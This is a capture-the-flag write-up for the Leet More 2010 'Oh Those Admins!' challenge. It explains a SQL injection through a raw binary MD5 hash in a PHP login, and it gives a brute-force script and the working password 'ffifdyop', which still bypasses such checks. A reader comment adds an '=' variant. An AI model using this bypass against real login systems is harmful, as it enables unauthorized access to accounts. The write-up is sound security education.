Leet More 2010 Oh Those Admins! writeup

Category: web-vuln?!

http://vos.uz/oh_those_admins/

http://vos.uz/oh_those_admins/index.php.txt

The php script takes a ‘password’ as input, calculates its raw (binary) md5, performs SQL query:

SELECT login FROM admins WHERE password = '$raw_md5'

and if it returns something, gives us full list of admins.

Raw md5 can contain any chars, and script puts them in query as is – it’s an sql injection vuln.
What we have to do is to bruteforce a password which’s raw md5 contains ‘or’1, so that the query looks like

SELECT login FROM admins WHERE password = '<trash>'or'1<shit>'

This will return all the rows, thanks to MySQL converting ‘1<shit>’ from string to int to bool true.

Math tells us there will be a usable hash every 256 ^ 5 / 11 = 99955602525 hashed passwords. With 5kk hashes per sec, you will get a solution in ~ 5.5 hours. That’s not so optimistic, so to speed up bruteforce, we can use different cases of ‘or’: ‘or’, ‘oR’, ‘Or’ and ‘OR’ + we can use its synonim ‘||’. Moreover, we can use all the 1..9 digits instead of just ‘1’. This gives us 45 times faster solution: a usable hash every 5 min.

I used a modified version of John to do the bruteforce, but even a php script will give you what you need in a reasonable time:

<?php 
for ($i = 0;;) { 
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

I’ve found a password: ffifdyop, with hash: 276f722736c95d99e921722cf9ed621c (‘or’6<trash>).
After logging in, we see the real admin’s password hash in binary: 00071cc0720abd73f61a291224f248d6

And, googling for it or again bruteforcing, we get the answer: 13376843.


More write-ups on “Oh Those Admins!”:

1 comment

3 pings

    • Charles Fol on October 31, 2010 at 21:08
    • Reply

    Hey.

    Actually, using a hash that contains ” ‘=’ ” will do the job.

    The query becomes :
    SELECT login FROM admins WHERE password=”=”
    which works.

    Explanations for ‘a’=’b’=’c’ -> 1 :
    ‘a’=’b’=’c’ is evaluated in this order : (‘a’=’b’)=’c’.

    As ‘a’ != ‘b’, ‘a’=’b’ gives us 0, and that leads us to the final comparison 0=’c’. Then, MySQL tries to cast ‘c’ as a number, and finds 0.
    The comparison is now : 0=0, which finally gives us 1.

    Thanks for that sweet CTF LeetMore :) see you next year.

  1. […] En effet j’avais déjà fait une épreuve dans ce genre là au Leetmore CTF (Oh Those Admins). […]

  2. […] 这里用到的exp为 […]

  3. […] 这里用到的exp为 […]

Leave a Reply

Your email address will not be published.